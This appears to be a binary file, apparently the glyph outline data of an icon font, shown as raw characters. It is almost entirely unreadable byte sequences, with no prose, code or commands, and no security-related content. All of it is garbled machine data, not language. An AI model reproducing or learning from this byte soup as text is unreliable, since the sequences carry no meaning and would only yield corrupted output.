�#rJ$X!	V�!,AMan���7254#"#47632#7##"&5462654&#"733>32#"&'##74&#"32673>32#"&'##74&#"326747632#32653#"'&7454&#"733632#454&#"#*
&	%,
''
Z&	'Q

:&

	'Q

	
5
! L&
#&M]'	#
'�		L0_
	%(
	Fl
O
	%(
	Fl
# 
	
3		.		D��A�/7%#'#7'#7&74767676&'&>67'?If.!�$!e"E*;f!1+2��I:rkrTWZ�`6M&�Of!$!�nG
5%"37)*= 
!.S�N�,2.'7!9�z�5����*+%%57.#>32632&#"'>32'.�����@~6�D[5#B5��#<<#."4�)�MM�)11����6��6ȀG8*2)1110o?II?DAT�����02#!"&7>37/>16./'7'67�"91��"91�_
g	E:4)s�)��))4)��w
qd
0=
@n������1>f���7#*&'#"1&7&6256&"#&47>323226765&#&/&5"54;67636763:'#/'"'&=47>'.'.5&632#.#"#"#"&'&6;26766&&7>&7�

),(V�
2
$!!%4!!�!	
#	
'	
	3�CK�7=�F4�/
	I4&�
	

"

e
��������	"
	#h&)G2#1			M����#42#!"&546354&+"#5#353;26'+".=46;2�

��

@(@@@@
9@(@..�
��

�
��#*('K�#'(H����?Rg"&4626'7'&'7'&/022130"''&1377676'6".#727&".'72��Α��=%
	
#
"3(9	






	
'Α�Α�*-+,-	3H	-,--	-6<	
Q6����
)5O62'&"..7>7&67>'&6'"&=462746#"&=4632>NG�I?�>i`b
UT

�	
OR^�			GE11E%"!%}CG=:�e�`
	T�
�Q

]�1		H		�

G0++0G

!1! 2
s!)2:+73272+72+732+7%2+72+72+7�"&GD~!%F�IF�GFFF(	FFyFFKYY�1Y1Y61Y�	1Y61Y����>`7>232"'.2"'.76#"'&'&'&'&547>76 '&'.'&54'&'&'"76767>�	

9C)	04
��
I!V"2+%v	�
X�	
�� ���.:G S������&6G%"'.'.567>7>3%327654'&#">'.#"?�
�";	- '48%(,
��	--
.$�	CB

TM��%

3%-L^
#5
)22	�

����#'+/37;?C3#75#73#75#73#75#3#75#73#75#73#75#3#75#73#75#73#��xp���xp���xp����xp���xp���xp����xp���xp�����ppx�ppx�pp(�ppx�ppx�pp(�ppx�ppx�����#$.>.7>7>76.'6L)5!)58Gs8	K8/fYH+�H5K;+3��5!*5!��P~F@e$>]4m��"C2.
)�u;����'/6"&4767&#"&546326&&2"&4264&">L


$'7L5-'UI�������^^�^&X

8*	6N"q߃�����^�^^���M�
 %#"&462'""&54632654632L'"22E1T".0G12"#)5##--&1F11�-#".."#5)#"21F1��q�)Xhu��7#"&=46;;2>=4#67>76#'&77>76/6.'&.&677&'#"&=46;2'"=4;2#754;2+"+"&=46;2�1/	.*75/62
G2$q%;Q�9,
7$>4R60 

&>(D�(

(		}


�				p�(		,5
+Y1+9%">,%)&".#@/	4C3

93$
�
(

(
(


			T���
2S^w�7+76;26'&++76;2";2#"&7>;#72+".>;+";2?6+"&?%2#7632+"&576&++"&?3+"&?>;2+76;2?6+"�
 	#%	
�

 (�90#	:	�$�		�IB
	/5!�
	_�%(#4

"c�#!(	@bJ(
����!'#31/#?#7�#���{p�651cb
os��t44<//.=
&J�2����%#"&4632.#"32>XA#_5g��g5_#A
6*>>*&�R#&+�Α+&#R>T>��*�.y���&767676.'&'&76'&'&0&'&0&&'&1.'241676727"#00'671327>7213"767676'&'4.501&'&'&76767632767617'"#7&'0'"'"#.76&'.'&'&'4'.'&7:30236'45"37>'&'6%&'6&74&5&'&5&76767&'&'&'&7671676'&'6'&272637'67'676&'&67&'67.4>56'&'&"#>767&R	"8		
 
�%	"))




�,H+#	
)%
  � 	!0	
			


	
��
"	
	
  
		"
 	|
]
)
;%

$X-.
-			�V


	15+*
!$% 


	
	

!
�




	
	�.:JZ3#5'.546762654&#"'3#5'.546762654.#"%!"3!2654&'2#!"&5463~44-.@
�44
.
-@	D��

�

&&��&&8�	&'	:


��'	:

�
�


 &�&&&������GL767>454'.'37#73'##".5&#".7547;2254'326&�
O
	4"�w�ZJ![!&R
T&6
�@$@&
	3+��7	

#/�

)$J���"'53'3#%#512>'.'&#4>1#53WJ�>>�Bj<3P-7]<`6[v@8S�__"JJ�=�@v[6`<]7-Q2<jBS��_����
%]$#".54>32"2"&4%&'!"&5463!24&/.+.67'"367./17672>7)
s(:=��XI
	
 ,h+.#%(
"S+
!
�

��5390Z��$KO$


	����
2+4546264&"7�\��\�Z5KKjKR�����[���KjKK5!K����#53+32&+325��0`ӽ�__q ��~�T��d
������-159=%#535#5#5'#53#5'#"'.7!27&6?6%#53#53#5'#5^BBB�BZB�BW
C)�vn8�	%+�B�B�BB�;�==�;;H<<<<d	.ciB!Z':
$;;;;;;H<<����/2:I%5!6767>'.#"&76767>357$4&"23676&/&'��YH0!"!H)("M["/��
'sZ&
	#0
162R@]R/"*4	.>>XA76�


�bD!3$4=B����
#)1AI7>77&'6>7&7&504576&'67&&7#!"&5463!24&"2Z(C�2!@�. KE.##DI'-(	2'4/0���`@^�^^��3$,K+%� 	71	�$(4
:".d %0���`���^^�^����32+532654&+#�rE> <_:��V_dQk@�F?[*P@&@a?@`7������
$,����>2&&#&676.2#".54&2"&4'3237.670>636"'&5"5&?"1"&46323&''&676767.'547>3>367.>>2'%6.67>4.'&""232>7&'&7>9
	�
�
		�


	N5j!@
	--H
 b9"
$-	6*"(	��
'
G	3	�(#	H�

l						�h

	


]
	(	
.%			�
O
1				U
.
O����
#2#>%13#67'.5!456WANdE#-�3
TQ `AWGDu�Oq�S�	.%$/	�k"/0ijY_���"3##5#5354632�UI^MM@5+k?[��[H9?Q����2'5.>7'7�\�S�FK")
&6MByn9yn�yVDk+*OCEF=0��=<�>����####5353533##5353##5!###�@����Z����@����������@���@@Z��������)<K73##576=4+53546324&#"#576=4/73''7'73733r]M;�	&55*/E

�
!	n
*+
&
&�3�"#
�32.*
 ��"	�	(�9-

-%
&&����Q�72+"=4;2+"=437010101010"01"101"1110101#0**1#*1"#"*#"#0"1*#"#*#0*&*1&#"#*1&#*#&'05&'4.#04'.5.14"5&'014&5&4&4&4&5'"&</0&1&54'4&'45"41&54&<&41&5<&<&504'41'041&5041<545&504145041<'45<547676767676767676320154+"#54+"#54+"#54#563232=4#"#"&#"5654""#54+"#54+"#54+"54667676���.;ed<.*33+
	

(,,(�4444}AOVSOA

��H�1

Z�H	LL	�����	(>.'&7667"&54>32&760m5	%#�01}~�~:c;4/	
	M`5m	#%%1U�
	19YY;c:!4��H�lw�5'.54765&'.546765.547.=46723>54&'&765>54'&76"32642>54&"6�ss�
�b5T1E9
4>N>dd>N>4
&8 iQ@i=
�

�	J15t����t51
-1d�
|h
Dc8Dr 
g>Eo\	
 	��
\pE=g
@S-V�h|JrC0-
�
"	
����"%2#"&54632&"327572&+5DDg]��\[A?&nNN74&%34v�
R�\]�B?'NpN$"q50*Y���� L'.7>327#!"&5463!245#"'.#"7670703'&'4+76,*
,!�!��!!P!v(&4
<4.!#O!C%!
5 *-"O��!!P!!�"�(*$:<, 
 
��c�0?732327676564/.'47>32753.'&"67>'.+

5'*27"3L+	O;2,f%IE�+D"(A"<-0	1'* #'Q;% 7@=���"�EA1QU.8@���%3!!'S�����6Q��!S�Q������������	%'%	&54'77E������<AA���<�ݡ�����
(
"@@���< ��@�*Q74654'.54>54'71"&5>54'#".5470>54/p
O,+!(!�C 	D�
8* >105,9)6
CF-4,	 *
P��~�&-OVd�#0��������67&'6?#64>4'&'.'&'4.77&"&576&'&'.77>2"'&'&637#"'&'.'&6?654&'&'.54746165>'&767674765&'.#'763263&67067>367632"22#66763267&#""67>76%2726767&'&#"&'&#667676;2&'67&76767>54/0&5&'&7676'&'&#"767&'&"'&'&#"45673&?67&'&'"276'&+"767#7>'12'"&/327"'&'&63=.%
		n	
%.? �	

�
(/((/	


#	




	(

	
		��	
1		t

	
& T  &	(=5
	f>v�
	F<)�


1

		+			




+			
4
�

		e
%(--$#
			
			
			

#1	
	+�
30+..+-3


!		!

	
�*+9	0@@<+*�	�

	����
���7#".5/267#"527654&654#"0#"76746767476'&#"47>76'&#"#"7676'0#&327717670767464676767676767"./3276732767>54&#"'&7>7632'.7&54632?64'"=32�%i��

	


+-*		
	

�ttD0
=9
DF9P	P


�	@					!	_P	

	
 �


1@<)���� 2#!"&54637#.'#3����Q#	%P���`�6�-/0"�g����!.'>72&#&'.=4>76&#"#"&#"0+".5&54>16&#"#"&#""3262324'&'.46546;23262�'��')N		n$p$���(&s)�k		1Fe

	::	
eF1			+		+	�����$>&''&'&'&67>./�O:
 # &
o"*>$!	
	THN(_-.R&`J7-#AM<g*:1*!<����6A%'#"&462675&5462#"'"'&46327&542654.#"�
+�
'/?L6,#2"2e9)(�s+_=>I06L2"2",8}()9����5EQ2"&4654""7676547676762+"&=4632>4.#"��ed�e�	r
X	/+<<+�+<<+y4Y33Y4Pqqpe�ee���
�
	
q"	4<+�+<<+�+<�d4XiX4q�q������=%'.7>767>5&540'.7>767676763636~*�
&
 �<,
43&#7Jc<
�	+Sl�����Lcs������� 27PZg������%!&'45.'&>767656.'&'&'.7>74.5&7>7676>367>7>72>5&626.5&6'6&'&'7676'&'.&>.'.'&'&7>36'4&'&6'>7'"76'&'465.'30'&'&'".4173&'"7<5&#>7<5"'&'&7>7&#&'342;&76'4.'.'636>&&>7&721&'&7&72>>7>.'.56'.'.#".7&6&7>7&'.'&'&36�
�Z
. 	
%g��4		k*"	6#-6, 
	
FC�
	
e
"��*)=�	
9$S

	�	#	�
`


$!�%*!
�8/V%	 %!

		
-?	
(|0

	�"^4	F
�$'?^2

	!%
			!)
�
	 
;

/	
	

 
& 	Z
)/
#
		D	'	
			$(
	
���">[.7>3267"1326'6&'&>76767>320676zX/lȯ/6#q?FpG3C		7a�3�	57K�/+&F-)
!�

.�"3	?�6ȯ/l�W8>��
6�>u".)KEP&/ 	
6
	"	!����6!!75##"'3262654&/.54>327&#"#"'��@�*"-"c'
	
!)"
		

"��@c��'  

	" 0
	+����B2#!"&54635##"'3262654&/.54>327&#"#"'����*"-"c'
	
!)"
		

"���`����'  

	" 0
	+���.D\huv?7'&'2#"&546%016"'&7'676'%&767''&>%2#"'&'&'67&54>2.7>3'654&'7@<1N/'	1;C3$)z/	
-?��.'.r?1N/'1;C3)
�	;H^uHQJ "":';B		 +#'�17D5		02J*(}1
,;,&18D5	$'<A+'

i]uI];6Fw$44#!!0����2!"&5463!24.#"326=7>/76&'&���`�

	<
!
1(&, `��.�	*L
?:


@����7>&/#"&54>32�SFK[>p( $'" )NGv 5ks6�L**/%$*������2DTa%&'&''.'&767:7.'&7>366/&#"#"7264&'&7>7676'&'&6~PK�	
?k
?A	`!��8	A���h�p3>�:[\	109E�eD

r����.	O
RK�	��9T1d�=
N������%6Rbx%+"/+"=4;254;2#2+"=432+"&=4;272+32+32+"=437#!"&5463!24&"67>76! R-�.�0"��"/0""/>_�`N;

.9"�G,*G,*GG<G9<GW��"/0""/0�6NN61J,'u	*H3'&5%3".=4&3#'546323#%53'57670&'&=325N,�/''<*%8��M*#&( -Mo�+
'"
M/MM'�+<.#MM�(6F
4�q����	''7'7�@��@� ?__? @�$�\\�%��\�$�77$���@�2:Bt7>3>32"".''&/*.7#"4;2#"4;27&767>54&"&'&'&'.54>32v


		

���(XX
KhK
	+J+B^�. 
A		�  @  �
,1(3HH3(1,	
'
/*G*[@/
��$4/5373#576=##576'H-�m_�'&�'l3�3	2	6��%��%&���	>>	��+�+O#"&54632>'&'&'66&'.732+"+"=4+"=4;2=4;2rnSg��gS�:&.��/
.��7�&"* b1j((0((0���gg���)�;B�^B/	)1-r+&U#* 
n0((0((����3#73#3#73#����������������������!&=4&"&=4.&5�,,*+$ ,,��t������$2"&454&"6754&"6324&"�Α�Α�"!�"�"/��Α������ ��=�����%3#"&'357#&5462#5'`lAR,Bq!lhh��K
�Α
K��@$6A7�iiP')g��g)'�������6G\h%&'7&"&'>='6267&"6267.'&47>330#'236"'&'.4"'6?7*�*h+&$:FF:$'�

,d,

0��>�>,,>VcU?,,�	#:
�$
�4&&J	
�
�-F%$G-�
 -EEEg:T&&U;g�(5{

����;j"/&7676?6=4/&6=4;2#"/&=4?67#"54;23254.'.54632+"'.#"�	>

/���20����0,b#7
",(V0).&<%j�jj�
���kk�k�!D
@
	@@ %%#53%!#5#5#35337#3537#3533533    ����@  ��@@�@    �@@�  � �``�� ��````7�G	DNW3#'#73%'.'&5#7327676&+"&7676763#";2675&66'67676&'&�-093-117�)O%�X

	�
�X!=	=%&i1	%
	 �jj�rs6&'	(
$
 	$#�*h
����7FNV^fnv~������:4>'4>7"&.'."'&5476324&"264&"264&"24&"264&"264&"24&"264&"264&"24&"264&"264&"27&'&"62X
	

#549 B�B (B^^B(��XXX(>�>	O��	

	
!(;��O5005OBB11B�SStSStSStSSD'  (
����	#/9AT"&463235#737'2#547#'35##5##5##54#"35'5'57'#353#"&7'326�g��g���`o)F9{�!8)�E
DEDD$	
8�Α�� �?�.

471M/:HJ0!!�gV

	,��8�
3m%#"'67>454676765&5654&.3276'&#"'4>;>3735467;23232+!".='#"&'�6) �&.^O8		,9

�Vb
	��
	�&:/I^,�5
(<[:4%H
R		K
	�	

�
���
%#"&46323lLLllLLl�Z�Lll�mm�������"5#"&'&546322>54&#"#".672654'6r<R'(F S{VSS=>/mKPn/?@B-$9%%B&�?WSn	+?*mTX~�9Qf(PttP(fQ9,A$5A	;������!,AI%#'#//75'737573724&3>7"'&'&476762564&"C	
				
-
	�^8�8)8? 8�8��Y~ZZ~Y�	 !	
				.0_87*80?!87�YZ~YY	����FMl������7&'.'&'&"#67>3021'.'&70703'.'&167&'&'57>01&'&76"45."&'&74"'50>767>0&'01&"'&167>76'0'27:63231'&'.'&'6160&'&'61�"Q

.		K"#8)'4
		R?(&$

�
�D"%#
F
3�*
%=C"'�"


!	"
	(
	)�!	$%\

	�	h744D	"//%	,
&0		



��#	�
	
		i

�	
������@�(;%57>'&5676'54'&'.7>??;
	͗

e%'E=�^6L;/=�� 		�a

.PLI66	#8
U�
���
<97*l	#/6#	1������(-&'&67%6'76&7'&>7'6/��##i

����a�t	S	jZP
�Q
\-!1(7����	��=	�������%GV%+3'&=46;26=32"32>54'"#"&'&7>;5#54>76#'2>4.#"�	�k5656 k(((�	�%$�k38r		�?.)&&f )0��	�167
)

			f �	
����/2#!"&5463&63265#"265265#"26=&6a'88'��'88'2	8�
��
	�8'��'88''8�	
�
�8	����U2"&46#"#"3232#*#"&7676#*#"&767676&#*#"32327656323276�Α�Α�	|	<	
5

'	
#.[A	��Α��		F5	B?F+E&����!@GQ[#"&=46;2'&#"#'#35>32#"&'365654'&'&'&#"32767&#>33264&#"3264&#"@�5KK5�5KK�	$
	x		S


 #"(3\









 K5�5KK5�5K��Z
F%%"'fx����	%(%'762#"/7/7676/&'&>&5��(BDrB�fE:0
�]$#
0"-��{&�9b6'BsCf�#P%
"
!)%0
@Sk��>F��R�":FNZ'.'>'.676&/>62654.#"0676?'".5466&66".5&6�;++;8�>"L@(
(?L">��`�?j?a�4,B	
"#=##"w	##	V&pq%%
 	$3?G ; 
��X>)E(X>6),8
r		
+			����2"&4'616/&"37#"�Α�Α�eJ�
"
�ZUTK
p��Α���w(�

�cc)����x#'+/37;?'77'7'7'7'777'?'7'?'/7'77?^6JN�."7Z %#	8	8<+!)#+.|G7-+3=5PCBY".',";##B1 
"
&		/
)�@
H96�`�-2W�B����@D57'.546'0'.'&/?>54&'514"�D66&/$:MO�<)	&,$-5+7(&
,>҃�s|57"';6[<<Z�X,

&1	:%*>4*9 0*
(
<��7!>'#.'6X-~w�x2M
)ps^`	5EE"�9m<Me�>`�L-T?-
Q����
'#"&462264&"��.<Dbb�b �jKLiL�&c�ccF7,LlLLl������MQ%&/&/'"&'&>?''"&'&>?'&>767'&67676767'�-
^
	4-5
-]
-	
.-
�^]�/
/ .

0

Z

/
///
Z
9 Z������67&>&7&'&'"'3>56'.54>327<
��w	C
!,z��'/)7
/
("2 
.8B�w	��<	,)+&$*!	"&

������=%/&?6?6/&/&?67/&6/&?6,�	�-�]TD:�4-�\_92�+�	�*��"�JRA,�V$�H\7'�*����� 2>"&462##"./567>324&#"'.'3264&#"32�$3##3XC/m1!:aGB/5�$&%�, $- (3##3$>/CO!,
k'e/B5�4%
&&	"�?,#-����A��%'"'<.'.'.01"'&76&*'&'&'&656&7>4645&>'"'.'&0#"'&'46'.'&54'&7>5&"5.6'.767>67>7>7>23>32307>302

			+%
	>59	,

	�N	
		 	'*
	
$$+-


,	$*

!

			����2637??7'7''''/'7'?�'8P
C]8Y9}�R�sf�|�1.�+l&
,ND&@'$J
.3D6
{l&Jc&Tz8a	%��E�a@NZamt����%#"'232654'%.54632&#73254.54632#54#"#"&'73"&=3255#532+53254+5#532+53254+54+532;2=3+"75#532#54+3#;2=3+"7#53##7373#5#'#�ApC#$e�3.5��3.5�e%"
e�<		
	



v$"'

9'9		%?4';� 6J5+#1,"10EJ]

	
		
M777H+HH+?=>
		?


	U������/#?6'&'&67%6�Dg2
��f�]��"L0
i�� �����(2#!"&5463>'."354;2+"=#����pGNhN^DD^���|��W84FF4D8����'575'7''7���X��eW"XVY@����-uKK�:55/7����#'+/39=AEIOSW]cko"'3'#4=3#&'7#&'7#57#57#5#5#57#5#5673'5353'53'3#&'!5353&'!'673'53#4=3�v0��gg�bnfggggggggggggg
ibgggggggg�
%ggg��S
t
tVggg  �
F	
#E�#EhE

#��

%JM�gs��
%	R

"��y�-In'.'&?6?>76367'432'&5676322'&'&#&56/&'&74>76�
�
4
	�5"�

�	%�	�%;
!�&�	7"





���"			���	}�����7#&'&761'''''#'&'7&'7&'7&'7&'7&'7&545'767'67'67'67'67'67'6?27777774&"26"&462654'&5'654'&5654'&5&=#+&'#&'#.'1#.547&+'&54704&5232673275#327.'&�,+-"%
$"-+3378:;	7;	16(."".(61	;8	<:883Jg�hh�OYYY|
)

�
	
					

>k

�" %$'&&&&'
#%"	


,'
84
A?GFHHFG?A
48',!�hh�g�~ZZ~Zy

Z
p@$





!eB����;Q>;2=4632+""&5&54.+"&=4>2;2"'4.5&6327632�	c 	
!"d
e"!
	 c	$11		CC		a3


	

% 	



	 %


��UUvv�����3Zes��#'"'.5'7#.767>;6&'.'*?>72>'"5&'"&636&'"&63&&54&#"432'.'&'&'./&6762?6�!
"J%	
	
$	0d$#4U 
I,-)0)
(D@
�
+(%*//E4:L
?


	

	

�}\&

	4 " m0�Nm([)/)#OO
#f 8!,4&	;C
K�"


		
	
����22#!"&54636'&6'&'&6323276���L2C!	%.B@���f�@N		 *h8
/>4VR��`�,U7"&/.>;2326?>;2#!"&/&;2326?>;2#'2+"./&#"+"&?>3i7!$$!	8

h8!$%!	7

�8
!%%!
8		`pK
K	p
pK
K	p
�pK
K	p
����BRa2#"/7'&546'&'&'&'.'&>76'.'&'"#"07>2#!"&54632654'&"7�m'(N7$2
�			


e���B^0.�]T#E'(56M
0 &7o


	
��`��]A@1.]A+%R����/:�''#/'7''7/5?'77'7?3772>54&"''#/'7''7/5?'77'7?3/3267;?3?'�	

w"/!!`/7'6''
*
$%7&66'5%$*$/>,%:
			B!!/!(
#&4(66'2#&)'$4'4.
:&+>/#����
@J2"&427&/7654'&54632&#"23767/"&63376>54'�Α�ΑE9k�&$DC?P@W&G9<		R0"%<		D3<��Α��gAl$+��
��	G�J6 #;-�_		��f=92%+����+AQ%'&'.547>''&'&'&7>7>576'&'67632%'76"&'".rG;14;3
Y6T�Z!	69

`+#��	?y2
1)�W $	!/_0R�mU-	2G)" 		1A<"Rx(
@�
	


����7#7&546;#5#";�W@`KU@R7&2X���&gMT��8;m��.�533�p8R^4y@�*������<�D/;C\gy'&7670#1#"&#"#'.7672326732+#73264&#"&54?54#"#4>32#5#'26="#532?'3373u

nI%*#�6&
"n3$#5	"!
9#$B�M%�&
a
	J	�ss���@�'DPj|+534?#"7#!"&5463!276'&5&7&'&#"&#3262327674&+3532>4.#"363232737##'##"#3267.M�� ��@
	
	
>




�3
Z
&			f$77Z

��`�

W	(	B�/
	cQQc��l�'.871#"&767672#&'.'&763276&'6�" �

_3+3U*'(%+}"
�
3>Acf5</x1.BAa-��F29H7.^
J'Gyd������&8Tb62#&'.'&547>5#"36#"'&'&5&76762"#&54&7676'&`p99%	1v$,'	&&L		
	�Q(
/Kc  	�ܙE%	r�!-ؼ*�?	
^(z\#!���

����;`ko������"$'"/&7672?6=4/&6=4;2#"/&=4?67#"54;23254'&5432+"5&#"7#"&4624"7#&54+#5322&4+3%/&=4/&"&=4?6;2%/&=4?6=4641'"#"357057&=4/&/&=4?6721200#'"=0/&=4?6'3'<::9:::+
7	��%$=>O===%.�$>%===Q�=>==KL!B!!B	BB	B!!B!B	)
�_,		,_$$d�$$G#	^�

##G$$*##F$$6�����-V5>76'.'&7676&'&'&'.77676'&7>7676'.zZCyOVR
%'-
$X+C;0-@(7!5
�c5Y6�c�	1c>X�!22'1#+
^."U	9b:;8 1	1-.H/HX\w
<c���<JRZqy���������&'&''.767&'.546767&'&67667>'676&'&&'&'67673276767&'&'&"67&'767&''6&'6767&1.67&'67&'&'76767#"'6'&'767>54&'&'2&"&462�*47-
;!!?	+52*			@"!;
!"

0�
'	



.
�		
_�"!4%


#*'z""
2
�!##	',#

}&&),0$>*		,*	*?C-R'6�
�JF
A

aN3$
��"! 
d	$10." 

!! &&����
#'##73'#'%'7>�MxNyT)A���<�
�� QQ���	88	7�I)P����%+5352>54&5475&54654&+532#"'73254'&'&54>32&#"23#"=#";#"&54654#5654&546;7#"'73254'&'&54>32&#"'2#327#".5&634#"ej+"*	
	��
+

K�+	!*	
	� #_##-9�
!			!
  
"	!*"	

<"6�	
"	 
"
!		"�
;"	

D+!#
&%.B���������	%72'47>&'&'&767&/"'&7676767&/#"&?#"'.7671'.767>7.'&67676'.'&767>'.21>767>2630>20127670656767>763206767632066'0"676'&2>65417654'.�)1%#



	

	
	<
M	-# !9^Bw1%H
-HWhK{;
!
'#�r 			"�p[
	EW,
$
 	"( 
		%
>%$& )75"*;/Z"">A'+	 


V

	
	:
		
	
�"-&j32

��337#'e[��08ਨ6rr����YY �� ������?''373�&&&� �� R��0n�\\�J��bb��$��BB	X�(	0D��7'##7'3'373537#5#53".46767624.'&"27>"&5475"4753#5##5353#5##535&/3#5##535'"475'"&5475'&5&5'43>?##7#'#077'373'k4>>>']>--�)d�


			
				
	W


P

&	&
	P

Y�AA?>@@�Y��**��c+<�``���ttt%

		%D		
)��)
Q((+��y�y���%'.'5#.='./&/'.?#+'&6?#'.5'"&'&'&'&4?673676720326?>7>;67>2?>026?67>?6766>?4567>72>?>7>3>?>6?67>'&%>'&>./.677>/&�
			:	

		
	
0


	
	

��

	

d
	�
:	
	


 


		
 "
6	
	$-5:/


-=(	%1%

m7
,�
	"
	����.%#"&#"##"&5&54622>3232632�
7%H2B"/"
%P
C	YNw"" ��p�7#3#3#3#5B22e3�3�2~BL�L��L���
L�)	?G���7573'7$"&546253#57'+'.45454>;654"2'#''.4547&'632&'54#"'&'#5.6?>767>36'7&54"2�&&)6�::�:Y
 	 k
 	#A
!	
:2)@&
 �.�`

x

�nn��w		Z((
T	 6^1J
	

'9((
��r�#'#!3'3��Y>>Y.CopC-���tt��X	<�D>RYhsw3#267#"&=6&#5375#"'53254.54632&#"#327#".5463234&#"'2#"'5362654&#"53�""	
�
,&_,��!SW  %"X.
	
q$#,'	r,/&&?	
"�*	)g�;$
$^	(
*+		!$#..3+%((2
�{B	!����k�!#"'53254.54632&#"�!090 l\QKTH7 090 iXLBDJ1%;(KO �.#8%KV�$����#327#".547>772#".546�)3&R$Y;	
:F$z�%%rYW@<O~�44'X8,=Ed�*Yn���,56767676#0#&1"#&'&'&'4'231'&'#'"54=46;204>3670600137654'&'&723223#"#"'4'1'&'&767621450454&'&5<5476367:450414#.'&7676"&747676'4'&'&""#"&767676'04767>56;2'"'&5<:3767>76'&'&5&3232<C!//UN+9%&)'QA�

		"
.!	�
	,	
#



			
�9

"{
!	:H�
***
(
j		



�	

!		u D�"	

=U&'��@�(8r��770=476'"'&.7676232#%#!"&5463!2#0&#"376767674#0"1"45.'&'&#"#"6761323250=4'&'&'"&+"176760"1&'&'323254=01767656'&'"'+01054&5&+"&'&'&'&'&230;21676767676&7&'&'&32376213676767674}�	"� ��$
		'~%
	
�				�AH((926D # /$.

�$#


���`,	Y2eT
<j	Y	T�<
�	
0

��8�%'7'8�������]]��\������2#!"&546337#53'#35�##��##�Qo>BvX�`�#��##G#W��tt��r����2#!"&54635#35#75#75#�	

	�l	

	�(�xxxxx�
	�l	

	�	
����((P((P((����27%#!"&5463!24'&'.+";2767>5�__��`*GrGr�66�`�;
,<,����!!5!3535��@f��YZ��@
Y��YZ�x/[nz�+"=4;2+"&=6/"+"54;2632##"'&=463276/&'&76322'&"'2#"'+"=4>2654.#"&2"&4�))`

))$�	$!5 &!+:�.?@-!)# $$$�"��
#�	{�Q�#"

-

i?[?Y�+	�%%3%��i.?f{�"264%2".54>6<.*#:>732"#73262#67>'.*##%64.*#:>732""#��������W�VV���V);GR:
x!G 

	�%			
%
%�x!G 	

	X[z[[zk-M\M--M.,$ �	Ge�6,�-	"`?	Gd�6,����%#"&462&'6&#"3762#".54.
!&e��ˏ	^GB]]B%R::)%

�ˏ�f3.Fk]�]�:R:%)��@�!-9EQ]i+""'.+"&=46;2>354+";2=4+";2=4+";254+";2=4+";2=4+";2ZI>=2Z�$88$���������������#(�.##.��@@v@@����+CUn|��%'&767>;0?'.47>'7>&'&766'&'"67656'&'&7672"67>/07'&76>?'&'67'&767Of8(
(%)RM
_0%w&

>eC
"./'G�32*"
(�.�37DG$�'�T4(�

YK$!C�	
	

(2!"�


G2��##
=	
-

	Z
�
	����G1&7>01'&".54327>3270>7>�"$
&',5+:3'<#5	)bBU!1&A5f7
"2�B
	7 	`	fX1!"4(���� -%##5#546;2'42"72#"&546"32>54&;M
ffEE#i��df��jVuwT4]:v�fxxf
9##"��hk��ge�-zQSx2^;Uv����)B2#"&54632>7'#5"'774'&7">753&654'&�i��df��VxS/"]')""=j@_$" #	0-;;��ik��fe��$Sw)&&"
�]+''"
9V:<����13M2#"&5462>741'#327#"&'#53<5#53'7#7654&#"67632&#"3�i�0>J&f��j!<%"
�[8
%-GAxCN�vUl>Q&:"!F��i+N<,�fe��=#82.50		#Sx�<Uv]$	*0
	
����!%:2#"&54627'##5#535'#53'7'7654&#"'3733�i��df��jlDR@=@@:	x�7@evU :*QB(+B?&��hk��fe��=c$$88''8 Sx�3-Uv$3V
`t���� 2#"&546"32>54&#5#5�i��df��jVuwT4]:v	�����hk��ge�-zQSx2^;Uv�++P**����#72"&42>7&'327#".547'703654&#"632&�Α�Α�%E5�$!.&'O3X�wS4YJ!D. (0
��Α���/` ,4##0`L0�Sw2*!4)����(4;2#"&5462>54&#"2+5254.+'2+#526&+�i��df��j4]:vUVuw�FF56"	^2
"?
��hk��ge��=2^;UvzQSx��l'Ol.,�C)����,37;2#"&546"32>54&#".''574575#5'?'5�i��df��jVuwT4]:vM :D	@?;C�qq(%'Y-��hk��ge�-zQSx2^;Uv�F
@F>>f,.-/:5++����<2#"&546"32>54&>32#".'332654.#"3'�i��df��jVuwT4]:v�$#5<*+'>4$
211��hk��ge�-zQSx2^;Uv�*++!;(.$.(+",11����s2#"&546"32>54&2742763276;#&/#"'4'#"'4'"5'#"'0&5'#"/+53767463274>276�i��df��jVuwT4]:vQ	
:3	
				
4-
��hk��ge�-zQSx2^;Uv5l<

P@
	a
,	 \

LH		W_WT

Y9		LbE\Pb
����_s2#"&546"32>54&3#&/"/"5'"/"/"/+53767627427627>7427624+54"#";2=�i��df��jVuwT4]:v;33+F��hk��ge�-zQSx2^;Uv�,S@:HQIFN+
I	Z

9PCT^-
E3
]	����4<@2#"&546"32>54&2+"&=#".=4732354735##3�i��df��jVuwT4]:v�6��)7l�ll��hk��ge�-zQSx2^;Uv��6�6se(C�����(192#"&546"32>54&2".4>"76'&3254�i��df��jVuwT4]:vr:*		*:*		G,6%=	
,��hk��ge�-zQSx2^;Uv<+/6/++/6/+Yd
	.i
Y?�A9AMaf3#7'#&5#"&547#"'#6=3632672354#"#632'3264&"75"326%673#"&54632'.^"c$=) ('  &.
C)!"C0%7��--�/�d)+!*)*)$+"--�6t
B		
�P($	!!+m00)!$*&&������Vbr���7"&463262"&47#>''.7#&'<>767&7'.57>32672%676'&#"46>'.#'?76'&'&1?&'&''#"/&7&7&'67676%7�


V�1"?*/(	
'
	
/$9��		2##&h		
~, 


	
,.DXn&��
.;,N
;*'!(#


 $<�
?


%
<g%#((	

	#$60I^/ �������3^'26?'.45454>?62<.'&'.3547635476�

 fM&

325	
.�/KDD/.
H2	
%-7..�4 

 4r
??$r��E�2EK%#'#5.5463253:654&#"22>54.*#27&#EXCp(!%cf��xO�N�-E8�
		
Ft`[��
	
	
�R9rK	>>lGQr4ZC'A�
%#HBCN]�����<_i!!%5"'&'>54&#"'22#23235".4=372><1#3#"=463274.#""'5632��@
<		$


d

%��@r!m.*
�
	
 -E#���!Wc7'&'&7>'&'47>767'&=&'&"#&=76767676'&76760'.67276�3$#�(f42,E%D	d(\N;	,:�m	�4!Q!e"(
	
!!%$,v.Ts7%G.'
1+	1,i*4
�
 *%����c2"&4264&"2"&4264&"%'''"'7&'7&'7&'7&47'67'67'67'627777'�Α�Α�ƍ�ƍ��������||�|�J=7$

$6>JMRSNJ=7$

$7=J
NSR��Α����ƍ��?�������|�||�'$7=JNSSNJ>7$

$6>JMRRMJ>6#

���'?/?557G$##T))33d#$$T33*,,+y�--��::"++,��::��-����DLRX^dj"&462"264'./'6373#'#5&''7&'#5367'76?#.'%#63&%3'6&'756_Α�Α�������8-18.%-D 
;;	RR	;;
 
;;	RR	;;�"
